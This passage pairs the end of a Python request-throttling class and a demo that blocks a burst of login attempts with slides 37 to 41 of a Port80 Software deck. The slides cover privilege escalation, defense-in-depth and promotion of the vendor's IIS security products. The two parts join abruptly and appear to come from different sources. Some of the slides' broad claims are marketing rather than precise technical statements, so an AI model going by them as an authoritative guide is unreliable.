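        """Return True if the request may proceed, False if it should be refused."""
        if self.blocked.get(ip, 0.0) > now:
            return False
        key = (ip, path)
        q = self.hits.setdefault(key, deque())
        while q and q[0] <= now - self.window:   # drop hits outside the window
            q.popleft()
        q.append(now)
        if len(q) > self.limit:
            self.blocked[ip] = now + self.block_for
            return False
        return True


if __name__ == "__main__":
    throttle = RequestThrottle(limit=3, window=1.0, block_for=10.0)
    # Constructed burst: five POSTs to the login page within half a second.
    for i in range(5):
        t = i * 0.1
        print(f"t={t:.1f} /login from 203.0.113.7:", throttle.allow("203.0.113.7", "/login", t))
```

In production the timestamps come from the clock and the state should live in shared storage if more than one server process handles requests; the decision logic stays the same.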
• 37. Privilege Escalation Attacks: Control is the ultimate goal of all attackers. At the end of the day, almost every Web attack is an attempt to escalate privileges and gain remote control over your Web sites, apps, data and user communities. Privilege escalation is the act of exploiting a bug in an application to gain access to resources which normally would have been protected from an application or user with lower privileges.
• 38. Privilege Escalation Attacks, cont.: The result is that the Web application performs actions in a higher security context than intended, one meant for Web developers or system administrators. Buffer overflows, XSS, and CSRF are all examples of such privilege escalation attacks. Most hacks focus on getting admin privileges on the target Web site and can involve unauthorized access leading to printer protocol and remote data services attacks, or even the ability to run the command line with administrator privileges or the application's own privileges. At that point, your Web server is now the attacker's Web server, and they will quickly look to attack the rest of your network from that beachhead. Port80 Solutions: ServerDefender AI, ServerDefender VP.
• 39. Defense-in-Depth Works: How do you avoid being fully hacked? In general, it goes without saying that you should protect your ports and network with a standard hardware firewall, keep patching your OS, Web, app, and DB layers, authenticate secure sections of the site, and learn as much as possible about the security options in your code development on ASP, ASP.NET, ColdFusion, PHP, JSP, or any other type of Web-based application.
• 40. Defense-in-Depth Works, cont.: By additionally layering in Port80 Software's security solutions, you will augment these systems to directly protect your Microsoft IIS Web server, Web apps, and data from the bad guys out there on the Internet.
• 41. About Port80 Software (Web Server Technologies | Part I: HTTP & Getting Started): Solutions for Microsoft IIS Web Servers. Port80 software exposes control of server-side functionality to developers and streamlines tasks for administrators: Increase security by locking down what info you broadcast and blocking intruders with ServerMask and ServerDefender; Protect your intellectual property by preventing hotlinking with LinkDeny; Improve performance: compress pages and manage cache controls for faster load time and bandwidth savings with CacheRight, httpZip, and ZipEnable; Upgrade Web development tools: negotiate content based on device, language, or other parameters with PageXchanger, and tighten code with w3compiler. Visit us online @ www.port80software.com